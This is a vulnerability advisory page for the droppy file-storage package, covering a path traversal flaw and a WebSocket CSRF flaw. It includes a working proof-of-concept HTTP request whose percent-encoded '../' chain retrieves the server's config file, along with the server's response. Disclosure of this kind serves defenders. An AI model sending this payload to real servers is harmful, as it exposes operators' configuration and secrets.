droppy@1.4.9 vulnerabilities

Self-hosted file storage

Direct Vulnerabilities

Known vulnerabilities in the droppy package. This does not include vulnerabilities belonging to this package’s dependencies.

Path Traversal, severity: M

droppy is a library for self-hosted file storage.

Affected versions of this package are vulnerable to Path Traversal. A request path containing percent-encoded "../" segments is resolved outside the served directory, so configuration files can be fetched from a droppy server.

PoC

GET /!/zip/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%73%72%76%2f%64%72%6f%70%70%79%2f%63%6f%6e%66%69%67 HTTP/1.1
Host: 192.168.0.11:8989
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: s=XtlnyU3If2YoVi8jiExHS++NwzrMpQMbmS0l/usCPJcH2J8S
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Disposition: attachment; filename="config.zip"
Cache-Control: private, max-age=0
ETag: "4a-akoxq55ZKs8DpqVaiOcP6h8oCoI"
Date: Sun, 25 Oct 2020 18:27:10 GMT
Connection: close
Content-Length: 847

Backend Request: /!/zip/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../srv/droppy/config

How to fix Path Traversal?

There is no fixed version for droppy.

Vulnerable versions: * (all versions)
Cross-site Request Forgery (CSRF), severity: M

droppy prior to 3.5.0 does not verify the origin of cross-domain WebSocket requests. This allows attackers to send malicious requests that inherit the identity and privileges of the currently logged-in user.

How to fix Cross-site Request Forgery (CSRF)?

Upgrade to version 3.5.0 or greater.

Vulnerable versions: <3.5.0